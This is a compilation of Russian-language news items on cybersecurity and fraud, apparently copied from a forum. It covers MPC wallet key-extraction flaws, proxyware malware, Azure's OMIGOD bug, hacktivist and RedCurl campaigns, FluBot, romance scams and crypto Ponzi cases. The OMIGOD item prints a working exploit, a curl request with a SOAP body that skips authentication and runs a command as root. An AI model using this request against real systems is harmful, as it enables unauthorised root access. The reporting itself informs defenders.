Злоумышленник, в зависимости от параметров реализации, может отправить специально созданное сообщение и извлечь фрагменты ключа в блоках по 16 бит, извлекая полный приватный ключ из кошелька за 16 попыток.
Вторая ошибка ( CVE-2023-33242 CVSS: 9.6 ) затрагивает реализацию протокола Lindell17 (2PC), имеет аналогичную природу и позволяет злоумышленнику извлечь весь приватный ключ после 256 попыток.
Недостаток заключается в реализации протокола 2PC, а не в самом протоколе, и проявляется в неправильном обращении кошельков с прерываниями, что вынуждает их продолжать подписывать операции, которые непреднамеренно раскрывают биты приватного ключа. Недостаток также раскрывает секретный ключ клиента с помощью специально созданных сообщений. Для полного извлечения ключа требуется 256 запросов.
Аналитики также опубликовали на GitHub два эксплойта для проверки концепции (PoC) для каждого из протоколов – [GG18 и GG20](https://github.com/fireblocks- labs/safeheron-gg20-exploit-poc) ,[ Lindell17](https://github.com/fireblocks- labs/zengo-lindell17-exploit-poc) .
Согласно иску, Маск и его компании Tesla, SpaceX, Boring и другие намеренно в течение двух лет подняли цену на Dogecoin более чем на 36 000%, а затем допустили ее крах.
В федеральный суд Манхэттена поступило измененное исковое заявление с требованиями на $258 млрд из-за поддержки Илоном Маском криптовалюты Dogecoin.
К иску, в котором CEO Tesla и SpaceX Илона Маска обвиняют в создании финансовой пирамиды для поддержки криптовалюты Dogecoin, присоединились новые истцы. Это семь инвесторов в криптовалюту. Круг ответчиков также расширился: к Маску, Tesla и SpaceX присоединились шесть компаний, в том числе компания Маска по строительству тоннелей Boring Co.
В измененном исковом заявлении говорится, что Маск и его компании намеренно в течение двух лет подняли цену на Dogecoin более чем на 36 000%, а затем допустили ее крах. Таким образом ответчики «получили прибыль в десятки миллиардов долларов» за счет других инвесторов Dogecoin, все время зная, что криптовалюта не имеет внутренней ценности, а ее стоимость «зависит исключительно от маркетинга».
source: reuters.com/markets/us/elon-musk-258-billion-dogecoin-lawsuit- expands-2022-09-07/
Злоумышленники зарабатываю на взломе серверов Microsoft SQL, превращая их в прокси-серверы, которые затем сдают в аренду за деньги.
Южнокорейская компания Ahnlab рассказывает о вредоносной кампании, в рамках которой хакеры воруют чужую полосу пропускания, устанавливая на взломанные машины proxyware и используя их в качестве прокси.
Такие прокси-системы используются «арендаторами» для различных задач, включая вполне легальное тестирование, сбор данных или распространение контента. Однако подобные прокси также позволяют получить доступ к «живым» IP-адресам, которые не занесены в черные списки интернет-магазинов, и могут применяться для самых разных незаконных действий (конечно, без ведома пользователя).
Эксперты объясняют, что существуют сервисы, которые позволяют владельцам устройств превратить их в прокси и получать определенный процент от сумм, взимаемых с клиентов, в обмен на «совместное использование» полосы пропускания. Например, статистика сервиса Peer2Profit гласит, что пользователи зарабатывают до 6000 долларов в месяц, устанавливая proxyware на тысячи устройств.
[](https://xakep.ru/wp- content/uploads/2022/07/397103/proxy-revenue-generated.jpg)
По информации аналитиков Ahnlab, в последнее время на таких сервисах всех чаще зарабатывают не простые пользователи, а хакеры. Исследователи пишут, что появились новые вредоносные кампании, в рамках которых злоумышленники заражают жертв proxyware, чтобы зарабатывать деньги. Хакеры получают проценты за использование чужой полосы пропускания, устанавливая свой email-адрес в качестве почты пользователя, а жертвы не замечают ничего или порой наблюдают небольшие замедления и сбои подключения.
Эксперты описывают установку proxyware для таких сервисов, как Peer2Profit и IPRoyal, которые часто распространяются с помощью рекламного ПО и другой малвари. Так, после заражения, вредоносное ПО проверяет, запущен ли прокси- клиент на хосте, и может использовать функцию p2p_start() для его запуска, если он неактивен.
[](https://xakep.ru/wp- content/uploads/2022/07/397103/peer-2-profit-create-n-run.jpg)
В случае с IPRoyal Pawns, малварь предпочитает устанавливать CLI-версию клиента вместо версии с GUI, так как процесс должен работать максимально скрытно, в фоновом режиме.
[](https://xakep.ru/wp- content/uploads/2022/07/397103/pawns-installation.jpg)
Также порой злоумышленники используют Pawns в виде DLL и подставляют свои email-адреса и пароли в виде закодированных строк, запуская функции Initialize() и startMainRoutine().
[](https://xakep.ru/wp- content/uploads/2022/07/397103/pawns-start-routine.jpg)
Согласно отчету Ahnlab, операторы малвари, использующие эту схему для получения доходов, нередко атакуют уязвимые серверы MS-SQL для установки клиентов Peer2Profit. Такая активность наблюдается с начала июня 2022 года, и большинство журналов, полученных с зараженных машин, указывают на существование упакованного UPX-файла с именем sdk.mdf.
[](https://xakep.ru/wp- content/uploads/2022/07/397103/sql-files.jpg)
Исследователи пишут, что пока неясно, сколько денег злоумышленники зарабатывают с помощью таких атак.
Клиенты облачной платформы Microsoft Azure, использующие Linux в виртуальных машинах, [столкнулись](https://www.wiz.io/blog/secret-agent-exposes-azure- customers-to-unauthorized-code-execution) с критической уязвимостью ([CVE-2021-38647](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-38647)), позволяющей удалённо выполнить код с правами root. Уязвимость получила кодовое имя OMIGOD и примечательна тем, что проблема присутствует в приложении OMI Agent, которое без лишней огласки устанавливается в Linux-окружениях.
OMI Agent автоматически устанавливается и активируется при использовании таких сервисов, как Azure Automation, Azure Automatic Update, Azure Operations Management Suite, Azure Log Analytics, Azure Configuration Management, Azure Diagnostics и Azure Container Insights. Например, атаке подвержены Linux- окружения в Azure для которых включён мониторинг. Агент является частью открытого пакета OMI (Open Management Infrastructure Agent) с реализацией стека DMTF CIM/WBEM для управления IT-инфраструктурой.
OMI Agent устанавливается в системе под пользователем omsagent и создаёт настройки в /etc/sudoers для запуска серии скриптов с правами root. В процессе работы некоторых сервисов создаются слушающие сетевые сокеты на сетевых портах 5985, 5986 и 1270. Сканирование в сервисе Shodan показывает наличие в сети более 15 тысяч уязвимых Linux-окружений. В настоящее время в открытом доступе уже размещён рабочий прототип эксплоита, позволяющий выполнить свой код с правами root на подобных системах.
Проблема усугубляется тем, что в Azure явно не документировано применение OMI и OMI Agent устанавливается без предупреждения - достаточно согласится с условиями выбранного сервиса при настройке окружения и OMI Agent будет автоматически активирован, т.е. большинство пользователей даже не подозревают о его наличии.
Метод эксплуатации тривиален - достаточно отправить к агенту XML-запрос, удалив заголовок, отвечающий за аутентификацию. OMI использует аутентификацию при получении управляющих сообщений, проверяя, что клиент имеет право на отправку той или иной команды. Суть уязвимости в том, что при удалении в сообщении заголовка "Authentication", отвечающего за аутентификацию, сервер считает прохождение проверки успешной, принимает управляющее сообщение и допускает выполнение команд с правами root. Для выполнения произвольных команд в системе достаточно использовать в сообщении штатную команду ExecuteShellCommand_INPUT. Например, для запуска утилиты "id" достаточно отправить запрос:
Code:Copy to clipboard
curl -H "Content-Type: application/soap+xml;charset=UTF-8" -k --data-binary "@http_body.txt" https://10.0.0.5:5986/wsman
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Компания Microsoft уже выпустила обновление OMI 1.6.8.1 с устранением уязвимости, но оно ещё не доведено до пользователей Microsoft Azure (в новых окружениях пока устанавливается старая версия OMI). Автообновление агента не поддерживается, поэтому пользователям необходимо выполнить обновление пакета вручную, используя команды "dpkg -l omi" в Debian/Ubuntu или "rpm -qa omi" в Fedora/RHEL. В качестве обходного пути защиты рекомендуется блокировать доступ к сетевым портам 5985, 5986 и 1270.
Кроме CVE-2021-38647 в OMI 1.6.8.1 также устранены три уязвимости ([CVE-2021-38648](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-38648), [CVE-2021-38645](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-38645) и [CVE-2021-38649](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-38649)), позволяющие непривилегированному локальному пользователю выполнить свой код с правами root.
Всплеск активности C.A.S (Cyber Anarchy Squad) позволил экспертам «Лаборатории Касперского» освежить свои знания о техниках, тактиках и инструментах кибергруппы, а также выявить ее связи с другими хактивистами. По данным ИБ- компании, группировка C.A.S проводит атаки на территории России и Белоруссии с 2022 года.
От нападений, нацеленных на причинение максимального ущерба, страдают организации разных вертикалей. Проникновение в сети мишеней обычно происходит через эксплойт уязвимостей в публично доступных сервисах — Jira, Confluence, Microsoft SQL Server. Иногда с этой целью используются услуги брокеров готового доступа. Развить атаку помогают добытые из открытых источников трояны удаленного доступа (в настоящее время Revenge RAT и Spark RAT). Используются также CMD, PowerShell, Meterpreter, а для сбора учеток — XenAllPasswordPro, BrowserThief и Mimikatz.
Чтобы уберечь зловредов от обнаружения, их папки вносят в список исключений Microsoft Defender. В качестве дополнительной меры защиты троянские экзешники маскируют под легитимные процессы Windows: svxhost.exe, svrhost.exe, rpchost.exe, ssbyt.exe. Взломщики также могут получить полный контроль над СЗИ — из-за неправильных настроек, и такие случаи нередки.
В ходе одной из атак C.A.S удалось отключить агент EPP, который забыли запаролить, с использованием rm.ps1. Для закрепления в системах создаются новые учетные записи (с помощью net.exe), а также новые ключи реестра. Во взломанную сеть запускаются шифровальщики, созданные с помощью утекших в Сеть билдеров LockBit и Babuk. Расширения, добавляемые к именам обработанных файлов, обычно генерируются случайным образом.
Иногда в этом качестве используется число 3119, сдублированное в имени
троянского файла. Как оказалось, это порядковые номера букв латиницы — C, A и
S.
Для нанесения еще большего вреда злоумышленники могут стереть данные в некоторых сегментах сети или на определенных серверах. С этой целью вначале с помощью утилиты df проводится сбор информации о подключенных дисках, а потом уже в ход идет dd.
Участники C.A.S, как и многие другие хакитивисты, любят похвастаться своими
успехами в Telegram.
Кроме телеграм-канала, у C.A.S есть открытый чат для ведения дискуссий с подписчиками. Примечательно, что среди его администраторов числятся также представители других хактивистских групп, в том числе Ukrainian Cyber Alliance.
В инфраструктуре одной из недавних жертв целевой атаки были обнаружены артефакты, указывающие на связь C.A.S с группировкой DARKSTAR, она же Shadow и Comet.
Как обещания высоких зарплат обернулись рабством для сотен иностранцев.
Филиппинская полиция освободила сотни людей, которых заставляли работать на аферистов в сфере "романтического мошенничества (Romance scam)" в небольшом городе Тарлак.
Как сообщается, 875 операторов крупной мошеннической сети, включая около 500 иностранцев, были освобождены после того, как они поверили обещаниям о высокооплачиваемой работе и были заперты в закрытом пространстве на сотнях квадратных метрах рядом с другими такими же бедолагами, и были вынуждены обманывать других людей, чтобы избежать «штрафных санкций».
Видео рейда на игорную фирму POGO, опубликованное филиппинской полицией 14 марта, показывает, как сотрудники Криминального розыскного и детективного управления (CIDG) входят в помещение, где работники сидят в ряд перед компьютерами.
Спасённые работники прибыли из Вьетнама, Китая, Филиппин, Руанды, Тайваня, Индонезии и даже Киргизии. Жертв якобы заманили обещаниями о предложении высокооплачиваемой работы. Вместо этого у них, как сообщается, отобрали паспорта и заставили притворяться онлайн-ухажёрами на сайтах знакомств, чтобы выманивать деньги у ничего не подозревающих людей.
Тех операторов, которые не выполняли квоты, наказывали физически: лишали сна, надолго запирали в специальных комнатах и даже пытали, сообщил Гилберто Круз, исполнительный директор Комиссии по борьбе с организованной преступностью при президенте Филиппин.
По данным официальных лиц, о ситуации стало известно благодаря вьетнамскому работнику, который прибыл в центр POGO в январе после обещания работы поваром. Ему удалось бежать и обратиться в правоохранительные органы. По словам полиции, на нём нашли следы пыток в виде ожогов от электрошока.
Во время рейда власти изъяли боеприпасы и оружие на территории в десять гектаров, расположенной примерно в 60 милях к северу от Манилы. Также там были найдены мобильные телефоны, сим-карты и текстовые скрипты для мошенничества. У 34 автомобилей, обнаруженных на территории, серийные номера и номерные знаки не совпадали с официальной автомобильной базой Филиппин.
С момента проведения рейда девятерым преступникам, связанным с деятельностью POGO, уже были выдвинуты обвинения. Согласно местным СМИ, только один из них был филиппинцем. Ещё пять человек были китайцами, двое вьетнамцами и один малайзийцем. Все эти лица обвиняются в нарушении законов против торговли людьми.
Предприятие, управлявшее данной мошеннической операцией, имеет название «Zun Yuan Technology Incorporated», а также весьма скромный сайт, который вряд ли сразу вызовет подозрения. На первый взгляд, он больше нацелен на набор персонала, чем на поиск клиентов.
На сайте компании также указано, что она была основана в 2023 году как восходящий «важный игрок/поставщик в игорной индустрии», предоставляющий «широкий спектр услуг, адаптированных к уникальным потребностям операторов онлайн-казино по всему миру».
А тем временем, мошеннические комплексы с использованием рабского труда уже стали весьма обыденным явлением в Юго-Восточной Азии. По данным отчёта Управления ООН по наркотикам и преступности за январь 2024 года, развитие масштабируемых и цифровизированных решений ускорило криминальный бизнес по всей Юго-Восточной Азии.
Отчёт отмечает, что распространение подобных операций принудительного труда усилило призывы к запрету деятельности онлайн-игорных операторов на Филиппинах, что привело к новым регулированиям таких организаций.
К сожалению, подобные меры регулирования, направленные на борьбу с операциями кибермошенничества, лишь вытеснили их из Камбоджи, Филиппин, Малайзии, Таиланда и Вьетнама в такие места, как Лаос и некоторые части Мьянмы. Так что нельзя утверждать, что эти действия возымели желаемый эффект.
Кто знает, получится ли у местной полиции полностью искоренить данный вид преступной деятельности, и когда, хотя бы примерно, это произойдёт.
Хотя в наших краях такие операции распространены в гораздо меньшей степени, стоит всегда проявлять особую бдительность в отношении сомнительных компаний, обещающих быстрый заработок: с высокой долей вероятностью такие организации могут оказаться мошенническими.
sc: newsinfo.inquirer.net/1918290/over-800-filipino-foreign-pogo-workers- rescued-in-tarlac-raid
Сотрудники уголовного розыска ГУ МВД России по Пермскому краю совместно с коллегами из Магнитогорска и Казани по подозрению в хищениях денежных средств задержали двоих мужчин.
«Установлено, что один из соучастников прошлой осенью приобрел GSM-шлюзы, сим- карты и компьютерное оборудование с целью сдачи в аренду телефонных номеров в теневом сегменте Интернета. В дальнейшем оказываемые им услуги IP-телефонии использовались мошенниками, и об этом злоумышленник был осведомлен. Впоследствии мужчина привлек к незаконной деятельности своего знакомого, который обеспечивал бесперебойную работу оборудования, менял сим-карты в GSM- шлюзах и контролировал стабильное соединение с интернетом.
Следователем СЧ ГСУ ГУ МВД России по Пермскому краю задержанные допрошены в качестве подозреваемых в рамках уголовного дела, возбужденного по признакам преступления, предусмотренного статьей 158 УК РФ. Им избрана мера пресечения в виде заключения под стражу.
Изъято свыше 12 тысяч сим-карт различных сотовых операторов, а также большое количество мобильных телефонов, системных блоков, роутеров, модемов и других предметов, имеющих доказательственное значение», - сообщила официальный представитель МВД России Ирина Волк.
В настоящий момент известно о трех эпизодах хищений с электронных счетов потерпевших. Предварительное расследование продолжается.
В отдел полиции № 8 УМВД России по городу Тюмени с сообщением о мошенничестве обратилась местная жительница. Она сообщила, что на одном из региональных сайтов познакомилась с мужчиной, который в ходе общения по телефону, длившегося на протяжении полугода, назанимал у нее свыше 700 тысяч рублей и не вернул. При этом каждый раз таинственный кавалер обещал приехать к ней, но затем переносил встречи под различными предлогами, в том числе прикрываясь якобы похоронами родственника.
Выяснилось, что мужчина, у которого есть супруга и трое детей, работает вахтовым методом и однажды действительно был направлен в Тюмень, где и зарегистрировался на местном сайте знакомств, а затем решил воспользоваться доверчивостью новой девушки. Обманом завладев её деньгами, он потратил их на личные нужды, в том числе и на погашение своих долговых обязательств.
Trust cloud they do!
Interesting to know, the word of trusting your company data in the cloud, never secure at all.
data ](https://www-theregister- com.cdn.ampproject.org/c/s/www.theregister.com/AMP/2023/08/23/ransomware_wipes_cloudnordic/)
IT outfit says it can't — and won't — pay the ransom demand
 www-theregister-com.cdn.ampproject.org
Хакеры не сдаются и ищут любые пути, чтобы похитить конфиденциальные данные.
Российская ИБ-компания F.A.C.C.T. зафиксировала новые атаки хакерской группировки RedCurl, известной своими активностями в области коммерческого шпионажа и воровства корпоративной информации.
Обнаруженные атаки были направлены на один из главных банков России, который был подвергнут кибератакам дважды: первый раз — с использованием специализированных фишинговых писем от имени крупного российского маркетплейса, и второй раз — через подрядчика банка.
Недавний отчет F.A.C.C.T. подробно описывает атаки RedCurl, произошедшие в ноябре 2022 года и в мае 2023 года. В обоих случаях первичной стратегией внедрения в корпоративную сеть стало использование фишинговых писем с вредоносным ПО. Письма были написаны от лица маркетплейса и обещали членам семьи и сотрудникам корпоративную скидку в размере 25% на все товары.
Пример фишингового письма RedCurl
Целью ноябрьского взлома стал известный российский банк из списка системно значимых кредитных организаций. Несмотря на попытку киберпреступников совершить вредоносную рассылку, их письма были обнаружены, заблокированы и не достигли получателей благодаря системе защиты электронной почты, установленной в банковской инфраструктуре.
После первой неудачной попытки хакеры RedCurl нацелились на подрядчика банка, использовав тактику атаки на поставщика (Supply Chain). Установив контроль над компьютером сотрудника подрядчика, предположительно через фишинговую рассылку, злоумышленники получили доступ к общему сетевому диску с документами клиента, что позволило им проникнуть в инфраструктуру финансового учреждения.
В ходе расследования инцидентов в ноябре 2022 и мае 2023 года, специалисты F.A.C.C.T. собрали и проанализировали образцы вредоносного ПО RedCurl.
На первом этапе заражения группа использовала загрузчик «RedCurl.SimpleDownloader», специально разработанный для новой кампании с использованием бренда маркетплейса. Специалисты F.A.C.C.T. считают, что это новый полноценный инструмент, который будет модифицироваться и использоваться в будущих атаках RedCurl.
На следующем этапе использовался обновленный загрузчик «RedCurl.Downloader» для загрузки «RedCurl.Extractor». Эта программа служит для установки агента «RedCurl.FSABIN», который, в свою очередь, предоставляет злоумышленникам удаленный доступ к зараженному компьютеру.
Представитель F.A.C.C.T. подчеркнул, что такие группы, как RedCurl представляют угрозу для российских компаний, которые не обладают решениями для раннего предотвращения сложных атак. Несмотря на то, что средство защиты электронной почты остановило атаку, киберпреступники нашли слабое звено в виде поставщика — этот вектор атаки необходимо также учитывать.
В своём отчёте специалисты F.A.C.C.T. описали цепочки заражения группы RedCurl, индикаторы компрометации (IoC) и рекомендации по защите в соответствии с матрицей MITRE ATT&CK.
Инициатива No More Ransom, благодаря которой жертвы программ-шифровальщиков могут восстановить свои данные, подводит итоги работы за шесть лет.
С момента создания количество партнёров программы выросло с четырёх до 188, а на сайте стали доступны 136 инструментов для расшифровки файлов. Всего с помощью No More Ransom более чем 1,5 миллиона пользователей по всему миру смогли восстановить свои данные — проект доступен на 37 языках.
«Лаборатория Касперского» как одна из компаний партнёров-основателей внесла свой вклад в разработку 9 инструментов дешифровки, которые помогают восстанавливать данные, зашифрованные 38 семействами программ-вымогателей. За последние 12 месяцев только в России эти утилиты были скачаны более восьми тысяч раз. Всего, начиная с 2018 года, пользователи по всему миру скачали их более 300 тысяч раз.
Как правило, программа-вымогатель шифрует ценную информацию на устройстве, делая её недоступной для пользователя. Заражение может произойти вследствие посещения небезопасных и мошеннических веб-сайтов, загрузки программного обеспечения, открытия вредоносных вложений, а также через протокол удалённого доступа (RDP) или эксплуатацию уязвимостей на серверах, подключённых к интернету. Затем злоумышленники требуют выкуп у жертвы, обещая взамен вернуть данные в первоначальном виде, зачастую также угрожая их публикацией. Этот тип атак развивается уже много лет и затрагивает как частных пользователей, так и организации, а сами злоумышленники создают целые экосистемы.
Инициативу по борьбе с программами-шифровальщиками в 2016 году запустили Европол, полиция Нидерландов, «Лаборатория Касперского» и другие партнёры. На официальном сайте участники проекта публикуют инструменты для расшифровки, руководства и инструкции о том, как и кому сообщить о киберпреступлениях. Эти утилиты и материалы уже помогли жертвам 165 видов программ-вымогателей бесплатно вернуть свои данные. Проект также призван повышать осведомлённость пользователей о том, как работают такие программы и какие меры можно предпринять, чтобы предотвратить заражение.
«Программы-вымогатели по-прежнему остаются одной из серьёзных проблем кибербезопасности. Только за первые три месяца 2022 года более 74 тысяч пользователей столкнулись с атаками шифровальщиков, и все они были успешно предотвращены. Здорово, что проект помогает людям и компаниям восстанавливать их цифровые активы без уплаты выкупов злоумышленникам. Таким образом, мы наносим удар по их уязвимому месту — самой бизнес-модели, которая предполагает заработок на расшифровке данных. Мы намерены продолжать бороться с вымогателями вместе с нашими партнёрами и будущими участниками проекта» — отмечает Дмитрий Галов, эксперт по кибербезопасности «Лаборатории Касперского».
source: nomoreransom.org/ru/index.html
Европол объявил о уничтожении одного из самых быстро распространяющихся вредоносов – трояна FluBot. В операции по уничтожению вредоносного ПО приняли участие 11 стран.
По данным властей, FluBot активно распространялся через текстовые сообщения, похищал пароли, банковские реквизиты и другую конфиденциальную информацию с зараженных смартфонов. Инфраструктура, поддерживающая троян, была уничтожена голландской полицией в мае, в результате чего вредоносная программа стала неактивной, сообщает Европол.
Впервые FluBot был замечен в декабре 2020 года, когда вредонос успел волной прокатиться по миру, взломав миллионы устройств. Визитной карточкой трояна был его способ распространения – безобидные SMS-сообщения. В них жертву просили перейти по ссылке и установить и установить приложение для отслеживания посылок или прослушивания фальшивого голосового сообщения.
После установки FluBot запрашивал разрешения на доступ к данным устройства. Получив доступ, хакеры похищали учетные данные банковских приложений и криптовалютных счетов жертв, а потом отключали встроенные механизмы безопасности.
Поскольку вредоносная программа могла получить доступ к списку контактов, она распространялась как лесной пожар, отправляя сообщения со ссылками на FluBot всем контактам жертвы.
По данным Европола, специалисты все еще ищут злоумышленников, распространявших FluBot по всему миру.
Напомним, не так давно в Финляндии прошла волна заражений FluBot . За 24 часа вредонос успел заразить устройства десятков тысяч жертв.
• Source: europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based- flubot-spyware-infecting-android-phones
Пуховичский районный отдел Следственного комитета расследует уголовное дело по факту мошенничества в крупном размере. Об этом БЕЛТА сообщила официальный представитель УСК по Минской области Елена Крупенина.
"По данным следствия, 14 февраля 2021 года 55-летней жительнице Пуховичского района в социальной сети написал мужчина, который представился как Луи Джонс, генерал армии Сирии. На протяжении нескольких месяцев они поддерживали переписку, в которой мужчина высказал желание приехать в Беларусь в отпуск. Однако его подруге следует написать в ООН с просьбой отпустить его отдохнуть. Далее от якобы представителя ООН потерпевшей пришло письмо: за оформление документов необходимо перевести $545. В дальнейшем поступали и другие сообщения - о необходимости оплаты авиабилета, таможенных сборов, оплату посылок с документами. К примеру, в письме указывалось, что поскольку Луи - генерал армии и дворянин, он должен лететь на самолете бизнес-классом", - рассказали в УСК.
На эти цели потерпевшая, которая очень хотела увидеться с другом по переписке, брала кредиты в банковских учреждениях и осуществляла международные переводы денежных средств на имя лица, указанного в сообщении возлюбленного. В общей сложности доверчивая женщина в несколько этапов перечислила более Br12 тыс. Мужчина усыплял бдительность потерпевшей красочными рассказами о счастливом будущем и признаниями в любви, представлял радужные перспективы их совместной жизни. Когда женщина не смогла выполнить очередное предложение оплатить посылку (ей уже нигде не выдавали кредит), "генерал" внезапно пропал. Жительница Минской области обратилась в правоохранительные органы с заявлением о мошенничестве.
"В настоящее время потерпевшая допрошена, проводятся следственные действия и оперативно-разыскные мероприятия, направленные на установление лица, причастного к совершению преступления.
Компания Google [представила](https://security.googleblog.com/2021/10/introducing-secure-open- source-pilot.html) инициативу Secure Open Source (SOS), в рамках которой будет организована выплата премий за проведение работ, связанных с усилением безопасности критически важного открытого ПО. На первые выплаты выделен миллион долларов, но если инициатива будет признана успешной инвестирование в проект будет продолжено.
Предусмотрены следующие премии:
• $10000 и больше - за внесение сложных, имеющих большое значение и актуальных в долгосрочной перспективе улучшений, обеспечивающих защиту от серьёзных уязвимостей в коде или инфраструктуре открытых проектов.
• $5000-$10000 - для улучшений средней сложности, положительно влияющих на безопасность.
• $1000-$5000 для улучшений умеренной сложности, повышающих безопасность.
• $505 - для небольших улучшений, усиливающих безопасность.
Заявки на получение вознаграждения принимаются только для изменений, принятых в состав проектов с уровнем критичности не ниже 0.6 по рейтингу OpenSSF Critically Score или входящих в список проектов, требующих особой проверки безопасности. Характер предлагаемых изменений должен быть связан с повышением безопасности в таких областях как усиление защиты элементов инфраструктуры (например, процессов непрерывной интеграции и распространения выпусков), внедрение систем верификации по цифровым подписям компонентов программного продукта, повышение уровня продукта (рецензирование, защита веток, Fuzzing- тестирование, защита от атак через зависимости).
На этой неделе киберпрокуратура подала в мировой суд Тель-Авива обвинительное заключение против жителя Тель-Авива, обвиняя его в краже при отягчающих обстоятельствах, попытке кражи, передаче ложной информации, действиях с запрещенным имуществом и использовании хитрости, мошенничества и уловок с целью уклонения от уплаты налогов.
Согласно обвинительному заключению, подозреваемый, который работает внештатно в компании, предлагающей финансовые консультации, зашел на сайт Налогового управления и получил доступ к личным кабинетам 16 владельцев бизнеса. 11 из 16 были его бывшими клиентами.
Затем подозреваемый подал от имени заявителей и без их ведома заявки на получение грантов на борьбу с коронавирусом для тех индивидуальных предпринимателей, чей бизнес пострадал от пандемии коронавируса. Он вручную и намеренно изменил данные банковского счета, чтобы отразить свой личный банковский счет, чтобы гранты на лечение коронавируса были переведены на его счет, что позволило ему украсть у заявителей гранты на лечение коронавируса.
Таким образом подозреваемый при отягчающих обстоятельствах похитил в общей сложности 590 881 шекель ($183 904) и попытался похитить еще 12 000 шекелей ($3735).
Кроме того, подозреваемый использовал множество возможностей для совершения дополнительных действий с использованием грантов на помощь коронавирусу, которые он украл, зная, что это «запрещенное имущество», как оно определено в законе против отмывания денег.
Среди прочего, подозреваемый перевел крупные суммы денег на банковские счета своей жены, своего отца и своих деловых партнеров. Он также использовал кредитную карту, связанную с его банковским счетом, и снимал наличные со своего банковского счета. Тем самым он совершил преступление по отмыванию денег на сумму более полумиллиона шекелей.
Подозреваемому также предъявлены обвинения в налоговых преступлениях, поскольку он не вел свои счета в соответствии с требованиями закона, включая доходы от украденной помощи по коронавирусу, и не подавал отчеты в налоговое управление о вышеуказанных доходах.
Полиция изъяла $12 млн у Раджа Кундры, супруга знаменитой местной актрисы Шилпы Шетти, заподозрив его в причастности к мошеннической криптосхеме Gain Bitcoin, выманившей у инвесторов $800 млн.
При расследовании дела Gain Bitcoin следователи вышли на бизнесмена Раджа Кундру (Raj Kundra), мужа звезды Болливуда Шилпы Шетти (Shilpa Shetty). Бизнесмен не является главным подозреваемым в деле, пояснила полиция. Но у него конфискованы активы, включая жилую недвижимость в Мумбаи, зарегистрированную на имя жены.
Проект Gain Bitcoin был основан в 2017 году. Его создатели Аджай Бхардвадж (Ajay Bhardwaj) и Махендра Бхардвадж (Mahendra Bhardwaj) обещали инвесторам ежемесячную прибыль в биткоинах: 10% от вложенных средств. В общей сложности создатели Gain Bitcoin привлекли $800 млн. Правоохранители рассказывают, что для распределения выплат ранним инвесторам использовались деньги, привлеченные от новых участников. Когда в пирамиду перестали поступать вложения новых пользователей, выплаты прекратились, а организаторы конвертировали оставшиеся средства в биткоины, сохранив в анонимных цифровых кошельках.
По мнению прокуратуры, Кундра получил от Амита Бхардваджа 285 биткоинов, стоимость которых сейчас составляет более $18 млн. Эти монеты предназначались для открытия майнинговой фермы на Украине, однако задумка так и не была реализована, а биткоины остались у Кундры. Муж с женой отрицают причастность к мошеннической схеме.
В начале года полиция Индии арестовала иностранцев, создавших мошенническое приложение India SEBI для инвестиций в криптовалюты. Злоумышленникам удалось обмануть местных граждан на $1,8 млн.
Все течет, все обновляется, так и крупный телекоммуникационный гигант**AT &T, **протек (оказывается, еще задолго до того, как это стало мейнстримом) и обновил закрома в хакерских приватах.
В компании подтвердили [компрометацию](https://www.nbcnews.com/tech/security/t-says-data-breach- leaked-millions-customers-information-online-affect-rcna145817) данных, которая затронула 73 миллиона текущих и бывших клиентов, хотя изначально категорически отрицали причастность к инциденту, поскольку не было никаких доказательств взлома их систем.
Тем не менее,**AT &T **все же признала, что утекшие данные действительно принадлежат ее клиентам и датируются 2019 годом или ранее.
В общей сложности около 7,6 млн. отсносятся к текущим клиентам и 65,4 млн. - к бывшим.
Кроме того, оказалось раскрытой информация о паролях, что значительно увеличивает риск для безопасности аккаунтов пострадавших клиентов.
Причем, еще в 2021 году об утечке сообщалаShiny Hunters, а в 2024 уже другой селлер опубличил в даркнете полный дамп утекшей базы.
За признанием вины последовал сброс паролей для действующих 7,6 млн. клиентов, а**AT &T **ушел в нокдаун, пропустив очередной хук по своей «безупречной» репутации.
В ходе досудебного расследования полицейские установили, что житель Одессы организовал преступную группу, привлекая к ней двух знакомых. Злоумышленники под видом благотворителей, которые якобы находятся за границей, звонили военным, представителям духовенства, волонтерских организаций, говорили, что имеют желание передать бесплатно на нужды ВСУ автомобиль или другую гуманитарную помощь, однако необходимые средства для доставки благотворительной помощи в необходимый пункт назначения. И введенные в заблуждение граждане перечисляли деньги на счета, указанные псевдоволонтерами.
Чтобы пострадавшие не сомневались относительно благотворительных намерений аферистов, во время телефонных разговоров те создавали ощущение, будто автомобиль или другой груз уже в пути - шум загруженной проезжей части, сигналы транспортных средств и тому подобное.
Таким образом «благотворителям» удалось обмануть 14 доверчивых граждан и завладеть их деньгами в размере более 280 тысяч гривен. Средства они снимали с банковских счетов, делили между собой и тратили на собственные нужды, а с пострадавшими переставали выходить на связь.
Собрав достаточно доказательств, полицейские предъявили трем фигурантам обвинения:
- по ч.ч. 2 и 4 ст. 190 Уголовного кодекса Украины (в редакции Закона Украины № 2997-IX от 21.03.2023) и ч. 5 ст. 190 того же кодекса - завладение чужим имуществом путем обмана, совершенное повторно, по предварительному сговору группой лиц, совершенное организованной группой. В том числе пособничество в совершении данных преступлений (ч. 5 ст. 27 УКУ);
- по ч.ч. 2 и 3 ст. 209 - владение, распоряжение, изменение формы (преобразование) имущества, относительно которого фактические обстоятельства свидетельствуют о его получении преступным путем, совершенные лицом, которое знало, что такое имущество прямо и полностью получено преступным путем, совершенные по предварительному сговору группой лиц, организованной группой, в частности повторно.
Мероприятия проводили работники управления противодействия киберпреступлениям в Одесской области, следователи следственного управления и управления криминального анализа ГУНП в Одесской области.
Двое мужчин, один гражданин Украины, другой - России, создали в Луцке фирму, которая работала под вывеской «ИТ», но на самом деле обеспечивала деятельность российской сети онлайн-казино из десятков различных брендов.
Бизнес, работавший без соблюдения требований международного законодательства, состоял из более 30 брендов онлайн-казино, которые привлекли более 2 млн игроков со всего мира. Полученные сверхприбыли через офшорные компании поступали в российскую федерацию, сообщает Волынская областная прокуратура.
